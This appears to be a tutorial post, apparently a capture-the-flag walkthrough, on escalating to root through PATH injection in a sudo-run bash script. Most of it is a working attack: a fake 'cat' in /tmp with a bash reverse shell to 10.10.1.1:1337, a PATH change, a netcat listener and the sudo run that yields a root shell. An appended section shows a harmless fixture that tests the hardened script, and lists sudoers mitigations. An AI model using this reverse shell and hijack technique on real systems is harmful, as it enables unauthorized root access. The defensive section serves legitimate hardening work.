Today’s post is on path injection. Let’s get started.
Identifying path injection vulnerability
Path injection vulnerabilities can arise in many ways. However, this post will only focus on path injection in bash scripts.
A path injection vulnerability usually occurs when root users do not specify the full path of the file they would like to run. Let’s see the example below:
cmd$ sudo -l
[sudo] password for soulx:
User soulx may run the following commands on previse:
    (root) /home/soulx/vulscript.sh
#!/bin/bash
cat /etc/shadow > /dev/null 2>&1
In this case, the cat file/command was not specified with its full path. As such, we can inject another path into the $PATH environment variable and let a malicious cat file execute instead with root privilege.
Creating a malicious file
cmd$ nano /tmp/cat
Add the code below to the malicious
#!/bin/bash
bash -i >& /dev/tcp/10.10.1.1/1337 0>&1
Remember to change the IP address to your own. After doing so, save the file.
Make it executable
After creating the file, we have to make sure it is executable by changing the permission.
cmd$ chmod 777 /tmp/cat
Modify $PATH environment
As we created the malicious file in the /tmp directory, we will need to add it to the start of $PATH so that the /tmp directory will be searched first for
cmd$ export PATH="/tmp:$PATH"
Set up a listening service
Before we exploit the vulnerable script, remember to set up Netcat on your own system to listen on the port you have specified:
ownsys_cmd$ nc -lvnp 1337
Exploit the vulnerable script
We may now run the vulnerable script, where our malicious cat file will be executed instead.
cmd$ sudo /home/soulx/vulscript.sh
Your listening Netcat should receive an incoming connection and give you a root shell!
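The fix for the script above, shown beside the vulnerable form, as an added example that is not part of the original post. The script body comes from the page; the decoy cat (which only creates a marker file), the temporary directory layout and the function names make_fixture and hijackable are constructed for illustration. The fixtures use /bin/sh rather than /bin/bash so they run under any POSIX shell, and no sudo is involved.

```shell
#!/bin/sh
# Added example with constructed fixtures; not the author's files. No sudo is used.

# Build a decoy "cat" and both script variants under directory $1.
make_fixture() {
    mkdir -p "$1/decoy"
    # Harmless stand-in for an untrusted PATH entry: it only creates a marker file.
    printf '#!/bin/sh\n: > "%s/marker"\n' "$1" > "$1/decoy/cat"

    # Script body from the page (/bin/sh instead of /bin/bash for portability).
    printf '#!/bin/sh\ncat /etc/shadow > /dev/null 2>&1\n' > "$1/vulnerable.sh"

    # Hardened form: fixed PATH for all child processes, absolute path for cat.
    {
        printf '#!/bin/sh\n'
        printf 'PATH=/usr/sbin:/usr/bin:/sbin:/bin\nexport PATH\n'
        printf '/bin/cat /etc/shadow > /dev/null 2>&1\n'
    } > "$1/hardened.sh"

    chmod 755 "$1/decoy/cat" "$1/vulnerable.sh" "$1/hardened.sh"
}

# Exit 0 if script $1 runs the decoy when $2/decoy is first on PATH, else 1.
hijackable() {
    rm -f "$2/marker"
    PATH="$2/decoy:$PATH" "$1" || true   # the script's own exit status is irrelevant
    [ -e "$2/marker" ]
}

# Demo: report which variant let the decoy run.
demo_dir=$(mktemp -d)
make_fixture "$demo_dir"
for name in vulnerable hardened; do
    if hijackable "$demo_dir/$name.sh" "$demo_dir"; then
        echo "$name.sh: decoy ran (PATH lookup is caller-controlled)"
    else
        echo "$name.sh: decoy did not run"
    fi
done
rm -rf "$demo_dir"
```

On the sudo side, the sudoers settings Defaults env_reset and Defaults secure_path keep the caller's PATH from reaching the script in the first place.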